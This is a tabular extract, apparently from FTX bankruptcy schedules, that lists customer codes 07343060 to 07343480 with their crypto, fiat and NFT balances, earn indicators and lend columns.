| 07343060 | | USD[10.00] | | |
| 07343061 | | USD[0.00] | | |
| 07343062 | | USD[10.00] | | |
| 07343064 | | DOGE[141.12033457], USD[0.00] | | |
| 07343065 | | USD[10.00] | | |
| 07343066 | | USD[10.00] | | |
| 07343067 | | BTC[.00190851] | | |
| 07343068 | | DOGE[61.68234686], USD[8.03] | | |
| 07343070 | | AVAX[0], BF_POINT[400], BTC[0.00555138], LINK[.00000001], SOL[0], USD[0.00], USDT[0] | Yes | |
| 07343071 | | BCH[0], BRZ[0], BTC[0], CUSDT[3], DOGE[1], ETH[0], ETHW[0], GRT[0], LINK[0], SHIB[1], SOL[1.81485311], SUSHI[0.00000362], TRX[3], USD[0.00], YFI[0] | | |
| 07343072 | | CUSDT[5], USD[14.36] | | |
| 07343073 | | DOGE[1], USD[0.00] | | |
| 07343074 | | BRZ[1], DOGE[123.50220222], TRX[5], USD[0.00] | | |
| 07343075 | | USD[10.00] | | |
| 07343076 | | DOGE[0], TRX[1], USD[0.13] | | |
| 07343077 | | DOGE[.00464129], USD[0.00] | | |
| 07343078 | | CUSDT[1], USD[0.00] | Yes | |
| 07343079 | | BAT[.0039761], DOGE[565.61180392], USD[0.01] | | |
| 07343080 | | USD[10.00] | | |
| 07343081 | | CUSDT[1], TRX[1], USD[0.00] | | |
| 07343082 | | USD[10.00] | | |
| 07343083 | | USD[10.00] | | |
| 07343084 | | CUSDT[1], DOGE[1], USD[0.00] | | |
| 07343085 | | USD[11.02] | Yes | |
| 07343087 | | USD[10.00] | | |
| 07343088 | | DOGE[.30216339], USD[0.00] | | |
| 07343089 | | GRT[5.71354834], USD[0.00] | | |
| 07343090 | | ETH[.00442264], ETHW[.00442264], USD[0.00] | | |
| 07343092 | | CUSDT[6], DOGE[2961.49271943], ETH[.11965503], ETHW[.11965503], USD[0.00] | | |
| 07343093 | | CUSDT[2.42568632], DOGE[0], ETH[0], TRX[1], USD[0.00] | | |
| 07343094 | | ETH[0], ETHW[0], GRT[1], TRX[2], USD[0.00] | | |
| 07343095 | | USD[0.01] | | |
| 07343096 | | USD[10.00] | | |
| 07343097 | | USD[10.00] | | |
| 07343098 | | USD[10.00] | | |
| 07343099 | | BTC[.00000005], CUSDT[2], DOGE[.75915285], TRX[1], USD[121.77] | | |
| 07343101 | | USD[0.01] | | |
| 07343102 | | BRZ[3], CUSDT[3], DOGE[0], TRX[1], USD[0.00] | | |
| 07343103 | | USD[10.00] | | |
| 07343104 | | USD[10.00] | | |
| 07343105 | | BTC[0], DAI[.00000001], ETH[0], LTC[0], USD[0.85] | Yes | |
| 07343106 | | USD[10.00] | | |
| 07343107 | | DOGE[132.44534907], USD[0.00] | | |
| 07343108 | | USD[0.00] | | |
| 07343109 | | BAT[.82977325], BRZ[2.0046175], CUSDT[8], DOGE[2.97145208], GRT[0.00001855], TRX[3.07958734], USD[0.01], USDT[1] | | |
| 07343110 | | BTC[0], CUSDT[4], DOGE[0], TRX[1.00003369], USD[0.00] | | |
| 07343112 | | USD[10.00] | | |
| 07343113 | | BAT[2], BRZ[1], CUSDT[2], DOGE[0], GRT[0], TRX[1], USD[0.00] | | |
| 07343114 | | USD[0.00] | | |
| 07343115 | | ETHW[.829773], USD[4.81] | | |
| 07343116 | | USD[0.13] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07343117 | | USD[10.00] | | |
| 07343119 | | USD[10.00] | | |
| 07343120 | | USD[10.00] | | |
| 07343121 | | BRZ[1], BTC[.00095166], CUSDT[4], LTC[.15579704], TRX[1], USD[0.01] | | |
| 07343122 | | BRZ[1], CUSDT[16.02233868], USD[0.01] | | |
| 07343124 | | BAT[1.01583163], BTC[.00232834], CUSDT[22], DOGE[8045.68850682], ETH[.04170067], ETHW[.04118045], MATIC[81.0658157], NFT (31251821006750592/Doak Walker's Playbook: Cleveland Brown vs. Detroit Lions - December 27, 1953 #19)[1], NFT (37283766730081914/Tim Brown's Playbook: New York Jets vs. Oakland Raiders - December 2, 2002 #49)[1], NFT (489120708348728160/Doak Walker's Playbook: SMU vs. Santa Clara - September 27, 1947 #67)[1], SHIB[5997539.23469258], SOL[.44919942], TRX[6], USD[0.12] | Yes | |
| 07343125 | | CUSDT[1], USD[0.00] | | |
| 07343126 | | BTC[.00024624], SHIB[1], USD[0.00] | Yes | |
| 07343127 | | USD[10.00] | | |
| 07343128 | | USD[10.00] | | |
| 07343129 | | USD[0.00] | | |
| 07343130 | | BRZ[3], CUSDT[49], DOGE[86872.90993473], TRX[3], USD[0.00], USDT[1] | | |
| 07343131 | | DOGE[1], ETH[0], GRT[0], LTC[0], UNI[0], USD[0.00] | | |
| 07343132 | | LINK[0.00002087], USD[0.07], USDT[0.00000008] | | |
| 07343133 | | CUSDT[1], USD[0.00] | | |
| 07343134 | | USD[10.00] | | |
| 07343135 | | DOGE[706.31859593], SUSHI[.6046808], USD[0.00] | | |
| 07343136 | | USD[10.00] | | |
| 07343138 | | CUSDT[2], USD[50.93], YFI[.00093476] | | |
| 07343139 | | DOGE[142.12313776], USD[0.00] | | |
| 07343140 | | CUSDT[1], DOGE[.23890948], USD[695.04] | Yes | |
| 07343141 | | COMP[.02572115], DOGE[3.0242507], ETH[0], TRX[1], USD[0.00], USDT[0] | Yes | |
| 07343142 | | DOGE[1.04064927], USD[0.00] | | |
| 07343143 | | BRZ[0.00000002], CUSDT[1], DOGE[.87052144], USD[0.22] | | |
| 07343144 | | USD[10.00] | | |
| 07343145 | | BAT[3], CUSDT[4], DOGE[3986.874680005], GRT[2], LINK[1], NFT (335641906737894460/Pirate #2117)[1], NFT (371377887176322259/Pirate #2991)[1], NFT (387533131036737072/#8015 Inverse Bear)[1], NFT (437812455245817116/#8784 Inverse Bear)[1], NFT (442659321100345700/Citrine jewelfly)[1], NFT (445687469250438395/Humble Wabbit 004)[1], NFT (470951733705214596/#6915 Inverse Bear)[1], NFT (504745186124926110/Scoop #485)[1], NFT (523615334197526027/Pirate #36)[1], SHIB[19841271.84126984], SOL[2.03], TRX[5], USD[250.50] | | |
| 07343146 | | SOL[.40958876], USD[0.00] | Yes | |
| 07343148 | | CUSDT[4], NFT (334643761606398292/Mondays )[1], NFT (504605672923395758/Puggy)[1], TRX[1], USD[2.98], USDT[0] | Yes | |
| 07343149 | | TRX[1], USD[0.00] | | |
| 07343150 | | AAVE[1.10747108], BAT[2.11044234], BRZ[7.68967228], CUSDT[14], DOGE[496.80721448], GRT[18.09279703], LINK[2.20871908], LTC[1.09230784], MATIC[.0044504], PAXG[.00000175], SHIB[2], SUSHI[3.35287731], TRX[227.30489099], UNI[1.09950604], USD[22.87], USDT[6.59627959] | Yes | |
| 07343151 | | USD[10.87] | Yes | |
| 07343152 | | USD[10.00] | | |
| 07343153 | | BTC[.00112614], CUSDT[5], DOGE[742.97164886], TRX[1], USD[0.00] | Yes | |
| 07343154 | | USD[10.00] | | |
| 07343155 | | USD[10.00] | | |
| 07343156 | | DOGE[14.10184579], USD[0.00] | | |
| 07343157 | | USD[10.00] | | |
| 07343158 | | DOGE[1], TRX[47.061694], USD[0.00] | | |
| 07343159 | | BRZ[3], CUSDT[2], TRX[3], USD[0.01] | | |
| 07343160 | | USD[10.00] | | |
| 07343161 | | USD[9.66] | | |
| 07343162 | | BCH[0], DOGE[0], TRX[2], USD[0.00] | Yes | |
| 07343163 | | BTC[0], USD[0.00], USDT[0.00000001] | | |
| 07343164 | | BRZ[1], CUSDT[2], DOGE[.00004247], TRX[2], USD[0.19] | | |
| 07343165 | | TRX[.16621784], USD[0.00] | Yes | |
| 07343167 | | BAT[2], BRZ[3], CUSDT[3], DOGE[9000.99998080], SHIB[4177289.75851], TRX[5.99995740], USD[0.01] | | |
| 07343168 | | USD[10.00] | | |
| 07343170 | | DOGE[1], USD[0.01] | | |
| 07343171 | | USD[10.00] | | |
| 07343172 | | DOGE[.67667875], USD[7.57] | Yes | |
| 07343173 | | USD[10.00] | | |
| 07343174 | | USD[10.00] | | |
| 07343175 | | USD[10.00] | | |
| 07343176 | | DOGE[1], USD[0.00] | | |
| 07343177 | | BAT[2.12305194], BRZ[1], CUSDT[6], DOGE[0], ETH[0], GRT[1.00498957], SOL[0], TRX[5], USD[0.00], USDT[1.10539236], YFI[0] | Yes | |
| 07343178 | | CUSDT[2], DOGE[5.51245368], TRX[1], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07343179 | | USD[10.90] | Yes | |
| 07343180 | | USD[10.00] | | |
| 07343181 | | TRX[149.82727911], USD[0.00] | | |
| 07343182 | | USD[10.00] | | |
| 07343183 | | USD[10.00] | | |
| 07343184 | | BRZ[3], CUSDT[3], GRT[1], TRX[1], USD[0.00], USDT[2] | | |
| 07343185 | | DOGE[5.52106217], USD[0.00] | | |
| 07343186 | | USD[10.00] | | |
| 07343187 | | USD[10.00] | | |
| 07343188 | | DOGE[573.12323719], TRX[13125.99216702], USD[0.00] | Yes | |
| 07343189 | | USD[10.00] | | |
| 07343190 | | USD[10.00] | | |
| 07343191 | | BTC[.00007067], USD[15.47] | Yes | |
| 07343192 | | USD[10.00] | | |
| 07343193 | | BRZ[1], USD[0.01], USDT[1.02464573] | Yes | |
| 07343194 | | USD[0.00] | | |
| 07343195 | | DOGE[86.85925027], USD[0.00] | | |
| 07343196 | | CUSDT[1], USD[10.00] | | |
| 07343197 | | USD[10.00] | | |
| 07343198 | | CUSDT[2], DOGE[.00278558], USD[0.00] | Yes | |
| 07343199 | | USD[10.00] | | |
| 07343200 | | BTC[.00017539], USD[0.00] | | |
| 07343201 | | CUSDT[1], DOGE[.00000386], USD[0.01] | | |
| 07343202 | | BTC[0], NFT (309419047661068497/SBF Hair & Signature #1 #76)[1], NFT (386481416863639856/FTX - Off The Grid Miami #1585)[1], NFT (396274922679874052/SBF Hair & Signature #2 #75)[1], NFT (477474040924974630/SBF Hair & Signature #3 #66)[1], NFT (524312812464456645/Barcelona Ticket Stub #2474)[1], NFT (532666167278171267/Tungsten Cube 47)[1], USD[70950.39], USDT[0] | | |
| 07343203 | | USD[10.00] | | |
| 07343204 | | USD[10.00] | | |
| 07343205 | | BTC[.00088668], CUSDT[10], DOGE[1999.64804123], ETH[.03338114], ETHW[.03297074], MATIC[126.76509534], TRX[45.2092385], USD[2.01] | Yes | |
| 07343206 | | BAT[88.37259343], BRZ[1], CUSDT[16], DOGE[6289.82869149], GRT[24.9643808], SOL[2.55544264], SUSHI[23.49779237], TRX[9], USD[0.00] | | |
| 07343207 | | TRX[72.74004323], USD[0.00] | | |
| 07343208 | | ETH[0.09593231], ETHW[0.09593231], USD[0.00] | | |
| 07343209 | | NFT (305546884930692163/Entrance Voucher #2372)[1], USD[0.00] | | |
| 07343210 | | USD[10.00] | | |
| 07343211 | | CUSDT[1], USD[0.00] | | |
| 07343212 | | DOGE[1], TRX[1], USD[0.00] | Yes | |
| 07343213 | | BTC[.00102052], CUSDT[1], DOGE[.45404009], USD[0.00], USDT[1.09441359] | Yes | |
| 07343214 | | USD[10.00] | | |
| 07343215 | | DOGE[152.6697512], USD[0.00] | | |
| 07343216 | | CUSDT[2], USD[0.00], USDT[0.00077604] | | |
| 07343217 | | DOGE[11.79234853], USD[0.01] | | |
| 07343218 | | ETHW[.07108467], USD[0.95] | | |
| 07343219 | | SHIB[1], USD[0.00] | Yes | |
| 07343220 | | USD[10.00] | | |
| 07343221 | | CUSDT[3], DOGE[115.02892856], TRX[1], USD[0.00], USDT[.00273215] | Yes | |
| 07343222 | | USD[10.00] | | |
| 07343224 | | USD[0.01] | | |
| 07343225 | | BRZ[1], BTC[0], CUSDT[24], DOGE[1], SHIB[2], TRX[1], USD[0.00], USDT[1.0840684] | Yes | |
| 07343226 | | USD[10.00] | | |
| 07343227 | | USD[10.00] | | |
| 07343228 | | BRZ[1], CUSDT[1], DOGE[33246.46818272], TRX[3574.06328631], USD[0.02] | | |
| 07343229 | | BRZ[0], DOGE[0], SOL[0], SUSHI[0], USD[0.00], USDT[0.00000001] | Yes | |
| 07343230 | | USD[10.00] | | |
| 07343231 | | DOGE[3616.74076423], TRX[216.63281871], USD[0.00] | | |
| 07343232 | | USD[10.00] | | |
| 07343233 | | BTC[.00000008], DOGE[2.235093], USD[0.00] | | |
| 07343234 | | DOGE[1], USD[0.00] | | |
| 07343235 | | DOGE[138.89508129], USD[0.00] | | |
| 07343236 | | ETH[.00256143], ETHW[.00256143], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07343237 | | BRZ[1], CUSDT[2], DOGE[134.53205791], SHIB[1479072.24916895], TRX[1], USD[16.01] | Yes | |
| 07343238 | | BRZ[1], CUSDT[1], TRX[2], USD[0.00] | | |
| 07343240 | | USD[10.00] | | |
| 07343241 | | USD[10.00] | | |
| 07343242 | | BAT[.80330476], BRZ[2], CUSDT[1], DOGE[7], GRT[10.62994398], SOL[.00875499], TRX[1.08953749], USD[5.67] | | |
| 07343243 | | USD[10.00] | | |
| 07343244 | | USD[0.00] | | |
| 07343245 | | BRZ[1], DOGE[7385.98527264], SHIB[154535.62046051], TRX[1], USD[0.01] | | |
| 07343246 | | USD[10.00] | | |
| 07343247 | | USD[10.00] | | |
| 07343248 | | BTC[0], CUSDT[1], DAI[0], DOGE[3], ETH[0], LTC[0], SUSHI[0], USD[0.00], USDT[0.00000002] | | |
| 07343249 | | USD[0.00], USDT[0] | Yes | |
| 07343250 | | USD[10.00] | | |
| 07343251 | | USD[10.00] | | |
| 07343252 | | USD[10.00] | | |
| 07343253 | | CUSDT[1], DOGE[1.00654032], SOL[1.63084842], TRX[73.00789051], USD[0.01] | Yes | |
| 07343254 | | USD[10.00] | | |
| 07343255 | | BAT[1.01655549], CUSDT[1], DOGE[270.60157791], TRX[2], USD[0.01] | Yes | |
| 07343256 | | USD[10.00] | | |
| 07343257 | | USD[10.00] | | |
| 07343258 | | BF_POINT[300], CUSDT[9], DOGE[5236.48051362], ETH[.00674467], ETHW[.00666259], GRT[31.06182893], LTC[.03928346], SHIB[3005550.84171303], TRX[1], USD[1568.08] | Yes | |
| 07343260 | | USD[10.00] | | |
| 07343261 | | USD[10.00] | | |
| 07343262 | | BF_POINT[200], DOGE[147.57473581], ETH[1.34758983], ETHW[1.34702388], GRT[1.00313735], USD[5.76] | Yes | |
| 07343263 | | GRT[3.51256419], USD[10.00], USDT[1.4856206] | | |
| 07343264 | | USD[10.00] | | |
| 07343265 | | SHIB[1], USD[0.00] | | |
| 07343266 | | DOGE[1.60487753], USD[0.00] | | |
| 07343267 | | CUSDT[1], USD[0.00], USDT[0] | Yes | |
| 07343268 | | BRZ[0], DOGE[0.00007986], USD[0.00] | | |
| 07343269 | | ETH[.00001028], ETHW[.00001028], USD[0.00] | Yes | |
| 07343270 | | DOGE[2317.06200015], SHIB[1], USD[0.00] | Yes | |
| 07343272 | | USD[10.00] | | |
| 07343273 | | USD[10.00] | | |
| 07343274 | | USD[10.00] | | |
| 07343275 | | USD[10.00] | | |
| 07343276 | | USD[10.00] | | |
| 07343277 | | USD[10.00] | | |
| 07343278 | | DOGE[0], SUSHI[0], USD[0.01] | | |
| 07343281 | | BTC[.00000746], SHIB[13], USD[0.00], USDT[0.00017016] | | |
| 07343282 | | CUSDT[1], DOGE[2], USD[0.00] | | |
| 07343283 | | BTC[.0000164], USD[0.00], USDT[0] | | |
| 07343284 | | USD[10.00] | | |
| 07343285 | | BRZ[1], BTC[.02145856], CUSDT[3], DOGE[276.25527475], ETH[2.39754986], ETHW[2.39754986], GRT[1], TRX[3], USD[0.01] | | |
| 07343286 | | DOGE[1], USD[0.00] | Yes | |
| 07343287 | | USD[10.00] | | |
| 07343288 | | DOGE[45.29648984], USD[0.01] | | |
| 07343289 | | KSHIB[0], SHIB[0], USD[0.00] | | |
| 07343290 | | USD[10.86] | Yes | |
| 07343291 | | BTC[.0026374], DOGE[4052.15345551], ETH[.09233291], ETHW[.09233291], TRX[2], USD[0.00] | | |
| 07343292 | | BRZ[1], CUSDT[3], DAI[.00045159], DOGE[.00000163], USD[0.01], USDT[0.00001373] | Yes | |
| 07343293 | | BTC[0], GRT[0], SHIB[496.42881656], SOL[0], USD[0.00] | | |
| 07343294 | | USD[10.29] | Yes | |
| 07343295 | | USD[10.00] | | |
| 07343296 | | BTC[.00020965], USD[0.00] | Yes | |
| 07343297 | | USD[10.00] | | |
| 07343298 | | ALGO[.00264134], BCH[.00000943], BF_POINT[200], BRZ[2], CUSDT[16], DOGE[9182.05782494], ETH[.00385472], ETHW[1.33018157], NFT [308932840370188213/Entrance Voucher #3035][1], SHIB[9939475.69797088], SOL[1.05956357], SUSHI[20.79260854], TRX[5], USD[0.00] | Yes | |
| 07343299 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07343300 | | DOGE[1928.19288039], USD[0.00] | | |
| 07343301 | | USD[10.00] | | |
| 07343302 | | USD[0.00] | | |
| 07343303 | | TRX[1], USD[10.00] | | |
| 07343304 | | LINK[.2934747], USD[0.00] | | |
| 07343305 | | DOGE[41.98031207], USD[0.00] | | |
| 07343306 | | USD[10.00] | | |
| 07343307 | | CUSDT[1], DOGE[90.95917139], USD[0.08] | | |
| 07343308 | | CUSDT[4], DOGE[70.91411861], MATIC[.00006824], SHIB[1], TRX[1], USD[0.00] | Yes | |
| 07343309 | | USD[10.00] | | |
| 07343310 | | BTC[0.20603406], CUSDT[518.45845573], GRT[1.00486015], SHIB[1], TRX[573.91084825], USD[0.00] | Yes | |
| 07343312 | | USD[10.00] | | |
| 07343313 | | USD[10.00] | | |
| 07343314 | | DOGE[1], USD[25.78] | | |
| 07343315 | | BRZ[2], CUSDT[24], LINK[.00001911], MATIC[.03619039], SHIB[1], SOL[.00811624], TRX[6], USD[147.15] | | |
| 07343316 | | USD[10.00] | | |
| 07343317 | | USD[10.00] | | |
| 07343318 | | USD[10.00] | | |
| 07343319 | | CUSDT[4], DOGE[163.91147912], GRT[2], TRX[2], USD[0.01] | | |
| 07343320 | | USD[10.00] | | |
| 07343321 | | USD[10.99] | Yes | |
| 07343322 | | BTC[.00044903], CUSDT[6], DOGE[.09642107], TRX[1], USD[0.00] | | |
| 07343324 | | USD[0.01] | | |
| 07343325 | | USD[10.00] | | |
| 07343327 | | USD[10.00] | | |
| 07343328 | | BAT[.00178543], BRZ[2], CUSDT[3], DOGE[1.01766359], GRT[1758.52835364], SHIB[2], TRX[.01212131], USD[0.01] | Yes | |
| 07343329 | | USD[0.00], USDT[0] | | |
| 07343330 | | DOGE[852.62136108], TRX[1], USD[0.00] | | |
| 07343333 | | BRZ[1], CUSDT[2], TRX[4], USD[0.00] | | |
| 07343335 | | USD[10.00] | | |
| 07343336 | | CUSDT[2], USD[0.01] | | |
| 07343337 | | USD[10.00] | | |
| 07343338 | | BAT[0], BCH[0], BTC[0], DOGE[1], ETH[.0000479], ETHW[.0000479], LTC[0], SHIB[1], SOL[0], TRX[1], UNI[0], USD[0.00] | Yes | |
| 07343339 | | USD[10.00] | | |
| 07343340 | | USD[10.00] | | |
| 07343341 | | DOGE[55.67292511], USD[0.00] | Yes | |
| 07343342 | | USD[0.01] | | |
| 07343343 | | USD[10.00] | | |
| 07343344 | | USD[10.00] | | |
| 07343345 | | BF_POINT[100], DOGE[0], ETH[0], LINK[0], SOL[0], USD[0.00], USDT[0.00003516] | Yes | |
| 07343346 | | CUSDT[2], USD[0.00] | | |
| 07343347 | | SOL[.82], TRX[748], USD[0.29] | | |
| 07343348 | | BRZ[1], DOGE[4070.94096759], USD[0.00] | | |
| 07343349 | | BTC[0], DOGE[.000014], USD[0.00] | | |
| 07343350 | | BTC[0.00144448], ETH[0.00058432], ETHW[0.00058432], NFT (515649391507698812/Entrance Voucher #1864)[1], SOL[.00118225], USD[0.00], USDT[0] | | |
| 07343352 | | AUD[0.00], CUSDT[2], DOGE[13.95342992], ETH[0.01533071], ETHW[0.01513919], GRT[0], SOL[5.72451585], TRX[219.70972334], USD[0.00], YFI[0] | Yes | |
| 07343353 | | BRZ[3], CUSDT[10], DOGE[1], TRX[7], USD[0.00] | | |
| 07343354 | | USD[10.00] | | |
| 07343355 | | BAT[1.01224398], BRZ[1], CUSDT[9], DOGE[.67982362], ETH[7.58347353], ETHW[7.58047385], GRT[2.00367689], LINK[2.17118751], LTC[.55447093], SOL[14.63195341], SUSHI[.07161956], TRX[3088.77695924], USD[9818.01], USDT[2.10129342] | Yes | |
| 07343356 | | DOGE[1.03996459], USD[0.00] | | |
| 07343357 | | DOGE[0], TRX[0], USD[0.01], USDT[0] | | |
| 07343358 | | USD[10.00] | | |
| 07343359 | | DOGE[1864.7701114], GRT[23.01202059], SOL[4.58638866], SUSHI[19.85241409], TRX[1015.62150762], USD[0.00], USDT[9.68560835] | | |
| 07343360 | | DOGE[138.01413028], USD[0.10] | | |
| 07343361 | | USD[10.00] | | |
| 07343362 | | BAT[0], BTC[0], DOGE[0], ETH[0], LINK[0], TRX[0], USD[0.00], USDT[0] | | |
| 07343364 | | BRZ[0], BTC[0], DOGE[0], TRX[0], USD[0.01] | | |
| 07343365 | | BAT[1.87037962], CUSDT[95.34865697], DOGE[.50167524], GRT[1.1460139], TRX[37.86408686], USD[0.14], USDT[1.98921228] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07343367 | | DOGE[0], USD[0.00] | | |
| 07343368 | | CUSDT[7], TRX[1], USD[0.00] | | |
| 07343369 | | AUD[0.00], BTC[.00010313], CAD[0.00], DOGE[14.01053027], ETH[.00000752], ETHW[.00000752], EUR[0.00], USD[0.44] | Yes | |
| 07343370 | | BAT[1.00015521], BTC[0.03392218], CUSDT[5], SHIB[1], USD[0.00] | Yes | |
| 07343371 | | CUSDT[4], DOGE[1], ETH[.10813346], ETHW[.10813346], USD[0.00], USDT[0] | | |
| 07343372 | | BTC[0.00000043], DOGE[0], USD[0.00] | Yes | |
| 07343373 | | USD[10.00] | | |
| 07343374 | | USD[10.00] | | |
| 07343375 | | DOGE[.00000144], TRX[2], USD[0.00] | | |
| 07343376 | | BRZ[1], CUSDT[2], GRT[2], TRX[2], USD[0.00], USDT[1] | | |
| 07343377 | | USD[10.00] | | |
| 07343378 | | USD[0.00] | | |
| 07343379 | | BRZ[1], CUSDT[3], TRX[1], USD[0.00] | | |
| 07343380 | | USD[10.00] | | |
| 07343381 | | USD[10.00] | | |
| 07343382 | | CUSDT[3], DOGE[1], SHIB[3], USD[0.01] | Yes | |
| 07343383 | | CUSDT[1], DOGE[1.8777491], USD[0.00] | | |
| 07343384 | | USD[9.55] | | |
| 07343385 | | TRX[36.7764216], USD[6.00], USDT[1.99000799] | | |
| 07343386 | | USD[10.00] | | |
| 07343387 | | USD[10.00] | | |
| 07343389 | | USD[0.03] | | |
| 07343390 | | DOGE[25266.33180258], ETH[.0000239], ETHW[.0000239], SOL[25.53096867], SUSHI[.00004325], TRX[1813.30000012], USD[1.73], USDT[1.06772902] | Yes | |
| 07343391 | | USD[10.00] | | |
| 07343392 | | BTC[0], DOGE[0], ETH[0.00000001], ETHW[0], USD[0.02], USDT[0] | | |
| 07343393 | | AVAX[0], BF_POINT[100], BTC[0], ETH[0], ETHW[0], GRT[0], LINK[0], LTC[0], MATIC[0], SHIB[11], SOL[0], TRX[1], USD[0.00], USDT[0.00000001] | Yes | |
| 07343394 | | BRZ[1], CUSDT[6], DOGE[550.68393202], LTC[.5303943], SUSHI[0], TRX[1], USD[0.00] | Yes | |
| 07343395 | | USD[10.00] | | |
| 07343396 | | DOGE[.00000835], MATIC[10.08355259], USD[0.00] | | |
| 07343397 | | DAI[0], USD[0.06] | Yes | |
| 07343399 | | BTC[.00029271], USD[0.00] | Yes | |
| 07343400 | | USD[10.00] | | |
| 07343401 | | DOGE[145.58931351], USD[0.00] | | |
| 07343402 | | BAT[1.0165555], BRZ[1], CUSDT[2], GRT[1.00498957], TRX[3], USD[0.01] | Yes | |
| 07343403 | | USD[10.00] | | |
| 07343404 | | DOGE[0], ETH[0], ETHW[0], USD[0.01] | | |
| 07343405 | | BRZ[1], BTC[.01292264], CUSDT[2], DOGE[2.00000868], TRX[1], USD[0.42] | Yes | |
| 07343406 | | MATIC[2.807654], SHIB[38865.77171029], USD[0.00], USDT[0] | Yes | |
| 07343407 | | USD[10.00] | | |
| 07343408 | | DOGE[.852], USD[0.00] | | |
| 07343409 | | USD[10.00] | | |
| 07343410 | | CUSDT[4], DOGE[680.63075318], GRT[1.56733967], TRX[197.78595313], USD[0.69] | | |
| 07343411 | | BTC[0], DOGE[4242.33243887], USD[0.00], USDT[0] | Yes | |
| 07343412 | | CUSDT[2], DOGE[34.63107115], USD[0.00] | | |
| 07343413 | | USD[10.00] | | |
| 07343414 | | USD[10.00] | | |
| 07343416 | | DOGE[1], USD[0.00] | | |
| 07343417 | | BRZ[1], CUSDT[1], TRX[.0409996], USD[0.00] | | |
| 07343418 | | USD[10.00] | | |
| 07343419 | | USD[10.00] | | |
| 07343420 | | CUSDT[1], DOGE[388.1144913], TRX[1], USD[0.00] | Yes | |
| 07343421 | | BTC[0.00457687], CUSDT[1], DOGE[114.24343365], TRX[3464.34009382], USD[0.00] | Yes | |
| 07343422 | | TRX[1], USD[0.00] | | |
| 07343423 | | USD[10.00] | | |
| 07343424 | | BTC[0], DOGE[0], ETH[0], USD[0.00] | | |
| 07343425 | | USD[10.00] | | |
| 07343426 | | BRZ[1], BTC[0], CUSDT[8], DOGE[1], GRT[1], USD[0.25] | | |
| 07343427 | | CUSDT[1], DOGE[.00001994], TRX[2], USD[0.13] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07343429 | | USD[10.00] | | |
| 07343430 | | CUSDT[1], DOGE[.0220665], USD[0.00] | | |
| 07343431 | | AAVE[0], BRZ[0], ETH[0], LTC[0], SOL[9.62515705], SUSHI[0], TRX[0], USD[0.00], USDT[0] | Yes | |
| 07343432 | | USD[10.00] | | |
| 07343433 | | USD[10.00] | | |
| 07343434 | | USD[10.00] | | |
| 07343435 | | BRZ[1], BTC[0], DOGE[3], ETH[.00001164], ETHW[.00001164], GRT[1], NFT (396374565874649673/Magic Eden Pass)[1], NFT (425377391236218826/EZU Pass)[1], SHIB[6], TRX[1], USD[0.00], USDT[1.01811641] | Yes | |
| 07343436 | | USD[0.01] | | |
| 07343437 | | DOGE[1764.98700576], USD[10.00] | | |
| 07343438 | | USD[10.00] | | |
| 07343440 | | BRZ[0], CUSDT[1], DOGE[1.59028436], SHIB[13104466.33108322], TRX[2], USD[0.01] | Yes | |
| 07343441 | | CUSDT[3], DOGE[28.1354976], SHIB[187043.01989457], USD[0.00] | | |
| 07343442 | | USD[10.00] | | |
| 07343443 | | CUSDT[452.66333802], USD[0.01] | | |
| 07343444 | | BRZ[1], CUSDT[2], DAI[0], DOGE[1351.38358358], GRT[0], TRX[3], UNI[0], USD[0.00], USDT[0.79759508] | Yes | |
| 07343445 | | USD[0.00] | | |
| 07343446 | | CUSDT[3], TRX[3], USD[0.00], USDT[1.09010441] | Yes | |
| 07343447 | | USD[10.00] | | |
| 07343448 | | BAT[1], BRZ[2], CUSDT[1], DOGE[9315.72449442], TRX[1], USD[0.00] | | |
| 07343451 | | USD[10.00] | | |
| 07343452 | | USD[10.00] | | |
| 07343453 | | USD[10.00] | | |
| 07343454 | | USD[10.00] | | |
| 07343455 | | USD[10.00] | | |
| 07343456 | | CUSDT[3], DOGE[1762.54486817], SHIB[139949.68199525], USD[0.00] | Yes | |
| 07343457 | | USD[10.00] | | |
| 07343458 | | USD[0.01] | | |
| 07343459 | | DOGE[130.41757882], USD[0.00] | | |
| 07343460 | | CUSDT[3], DOGE[1580.72298845], USD[0.00] | | |
| 07343461 | | CUSDT[1.992], DOGE[0], USD[0.18] | | |
| 07343462 | | CUSDT[1], USD[0.01] | | |
| 07343463 | | BTC[.00009173], ETH[.00271847], ETHW[.00271847], USD[0.00] | | |
| 07343464 | | USD[0.10] | | |
| 07343465 | | USD[10.00] | | |
| 07343466 | | USD[10.00] | | |
| 07343467 | | USD[10.00] | | |
| 07343468 | | USD[10.00] | | |
| 07343469 | | USD[10.00] | | |
| 07343470 | | USD[10.00] | | |
| 07343471 | | USD[10.00] | | |
| 07343472 | | BRZ[1], CUSDT[12], TRX[2], USD[0.00] | | |
| 07343473 | | USD[510.00] | | |
| 07343474 | | BRZ[2], CUSDT[20], DOGE[1], LINK[0], TRX[4], USD[0.01] | | |
| 07343475 | | USD[0.01] | | |
| 07343476 | | USD[10.00] | | |
| 07343477 | | BTC[0.00083639], CUSDT[1], USD[0.00] | Yes | |
| 07343478 | | USD[10.00] | | |
| 07343479 | | USD[10.00] | | |
| 07343480 | | BRZ[1], CUSDT[16], DOGE[4922.87796016], TRX[2], USD[0.00] | Yes | |
